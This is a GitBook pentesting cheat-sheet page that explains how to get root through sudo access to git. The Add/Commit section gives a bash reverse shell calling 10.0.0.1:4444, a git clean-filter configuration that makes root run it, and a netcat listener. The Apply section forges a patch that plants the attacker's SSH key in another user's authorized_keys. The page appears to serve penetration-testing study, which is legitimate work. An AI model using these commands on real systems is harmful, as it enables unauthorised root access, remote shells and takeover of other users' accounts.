Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Git Add/Commit
  • Git Apply

Sudo Git Privilege Escalation

Sudo git is vulnerable to privilege escalation.

Git Add/Commit

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!

If we can commit the git repository as root, we may be able to escalate privileges.

Exploitation

  1. Create a Payload

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
Copied!

  1. Set Git Config

# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
Copied!

  1. Commit the Repository

Before committing, we need to start a listener in local machine.

nc -lvnp 4444
Copied!

Then commit with sudo.

sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!

Now we should get a shell in local terminal.

Git Apply

sudo /usr/bin/git apply *
Copied!

If we can apply the patch for the git repository, we can update the content of arbitrary file.

Exploitation with SSH Keys

Assume we are currently "user1" user then we want to escalate to be "user2". First we create a new SSH key.

cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa
Copied!

New SSH keys (private/public) are generated under /home/user1. Next, add the content of id_rsa.pub into authorized_keys..

cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys
Copied!

Then create a patch.

cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patch
Copied!

After that, replace the name “user1” with “user2” in the patch file.

sed -i 's/user1/user2/g' /tmp/patch
Copied!

Now we can apply the patch as root. This command update the target user’s ("user2") authorization_keys to allow us to login with SSH key as "user2".

sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/.ssh/id_rsa user2@example.com
PreviousSudo Fail2ban Privilege EscalationNextSudo Java Privilege Escalation

Last updated 1 year ago

Page cover image